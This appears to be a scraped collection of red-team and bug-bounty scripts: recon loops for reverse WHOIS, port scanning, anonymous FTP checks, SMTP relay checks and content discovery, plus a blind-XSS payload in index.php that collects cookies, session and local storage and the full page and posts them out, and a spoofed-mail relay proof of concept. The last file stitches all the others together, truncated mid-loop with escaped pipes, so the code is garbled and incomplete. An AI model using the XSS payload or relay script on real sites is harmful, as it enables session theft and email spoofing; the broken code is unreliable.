insi2304

## reversewhois_domain_enum.sh
email=$(whois $1 | grep 'Registrant Email' |awk -F':' '{print $2}'| xargs)
echo "https://www.reversewhois.io/?searchterm=$email" | html-tool tags td | grep -oP '\S+\.\w+'

## index.php
var mailer = '<?php echo "//" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] ?>';

var msg = 'USER AGENT\n' + navigator.userAgent + '\n\nTARGET URL\n' + document.URL;
msg += '\n\nREFERRER URL\n' + document.referrer + '\n\nREADABLE COOKIES\n' + document.cookie;
msg += '\n\nSESSION STORAGE\n' + JSON.stringify(sessionStorage) + '\n\nLOCAL STORAGE\n' + JSON.stringify(localStorage);
msg += '\n\nFULL DOCUMENT\n' + document.documentElement.innerHTML;

var r = new XMLHttpRequest();
r.open('POST', mailer, true);
r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

## ftp_check.sh
for i in `cat domain_port_scan | grep -Po '21/tcp.*' | awk -F" " '{print $3}' | sort -u`;
do
echo "checking ftp on host: "$i;
wget --spider --tries=1 --user=anonymous --password=anonymous ftp://$i/
if [ $? -ne 0 ]; then
    echo "Failed to connect to ftp host"
fi
done

## run_masscan.sh
#!/bin/bash
for i in `cat domains`;
do
j=`dig +short $i | tail -n1`
echo $j >> domain_ip.txt
done
for k in `cat domain_ip.txt | sort -u`
do
echo "Trying scanning hostname" $k
if [ -z "$k" ]

## smt_relay_check.sh
#!/usr/bin/env bash
declare -a arr=("25" "465" "587" "2525")

for i in `cat smtp_hosts`;
do
k=`dig +short $i | tail -n1`
if [ -z "$k" ]
then
      echo "No ip present corresponding to hostname" $i
else

## run_webanalyze.sh
#!/bin/bash

go get -u github.com/rverton/webanalyze/...

webanalyze -update

for i in `cat web_domains | grep https`;
do
webanalyze -host $i |& tee -a webanalyze_webdomains.txt;
done

## run_dirsearch.sh
#!/bin/sh

for i in `cat /root/work/bugbounty/recon/my_recon/data/webhosts`;
do
    python3 /root/tools/dirsearch/dirsearch.py -e php,jsp,asp,txt,zip,gz -u $i -w /root/tools/wordlists/content_discovery_all.txt | tee -a dirsearch_domain.log;

done

## mail_relay_poc.sh
#!/bin/bash

read -p "Enter Email Body: " body
read -p "Enter sender mail address: " sender
read -p "Enter reciever mail address: " recipient
mail_server_ip="vulndomain"
mail_server_port="25"
#recipient="youremail@gmail.com"
#sender="\"Vulndomain Support\"<${sender}>"

## run_meg.sh
#!/bin/sh

meg -v /root/tools/wordlists/content_discovery_all.txt /root/work/bugbounty/recon/my_recon/data/webhosts_new domain_meg

## my_recon.sh
#!/usr/bin/env bash

# This was created during a red team activity

#set -x
if [ ! -x "$(command -v jq)" ]; then
	echo "[-] This script requires jq. Exiting."
	exit 1
fi
	email=$(whois $1 \| grep 'Registrant Email' \|awk -F':' '{print $2}'\| xargs)
	echo "https://www.reversewhois.io/?searchterm=$email" \| html-tool tags td \| grep -oP '\S+\.\w+'
	var mailer = '<?php echo "//" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] ?>';

	var msg = 'USER AGENT\n' + navigator.userAgent + '\n\nTARGET URL\n' + document.URL;
	msg += '\n\nREFERRER URL\n' + document.referrer + '\n\nREADABLE COOKIES\n' + document.cookie;
	msg += '\n\nSESSION STORAGE\n' + JSON.stringify(sessionStorage) + '\n\nLOCAL STORAGE\n' + JSON.stringify(localStorage);
	msg += '\n\nFULL DOCUMENT\n' + document.documentElement.innerHTML;

	var r = new XMLHttpRequest();
	r.open('POST', mailer, true);
	r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	for i in `cat domain_port_scan \| grep -Po '21/tcp.*' \| awk -F" " '{print $3}' \| sort -u`;
	do
	echo "checking ftp on host: "$i;
	wget --spider --tries=1 --user=anonymous --password=anonymous ftp://$i/
	if [ $? -ne 0 ]; then
	echo "Failed to connect to ftp host"
	fi
	done
	#!/bin/bash
	for i in `cat domains`;
	do
	j=`dig +short $i \| tail -n1`
	echo $j >> domain_ip.txt
	done
	for k in `cat domain_ip.txt \| sort -u`
	do
	echo "Trying scanning hostname" $k
	if [ -z "$k" ]
	#!/usr/bin/env bash
	declare -a arr=("25" "465" "587" "2525")

	for i in `cat smtp_hosts`;
	do
	k=`dig +short $i \| tail -n1`
	if [ -z "$k" ]
	then
	echo "No ip present corresponding to hostname" $i
	else
	#!/bin/bash

	go get -u github.com/rverton/webanalyze/...

	webanalyze -update

	for i in `cat web_domains \| grep https`;
	do
	webanalyze -host $i \|& tee -a webanalyze_webdomains.txt;
	done
	#!/bin/sh

	for i in `cat /root/work/bugbounty/recon/my_recon/data/webhosts`;
	do
	python3 /root/tools/dirsearch/dirsearch.py -e php,jsp,asp,txt,zip,gz -u $i -w /root/tools/wordlists/content_discovery_all.txt \| tee -a dirsearch_domain.log;

	done
	#!/bin/bash

	read -p "Enter Email Body: " body
	read -p "Enter sender mail address: " sender
	read -p "Enter reciever mail address: " recipient
	mail_server_ip="vulndomain"
	mail_server_port="25"
	#recipient="youremail@gmail.com"
	#sender="\"Vulndomain Support\"<${sender}>"
	#!/bin/sh

	meg -v /root/tools/wordlists/content_discovery_all.txt /root/work/bugbounty/recon/my_recon/data/webhosts_new domain_meg
	#!/usr/bin/env bash

	# This was created during a red team activity

	#set -x
	if [ ! -x "$(command -v jq)" ]; then
	echo "[-] This script requires jq. Exiting."
	exit 1
	fi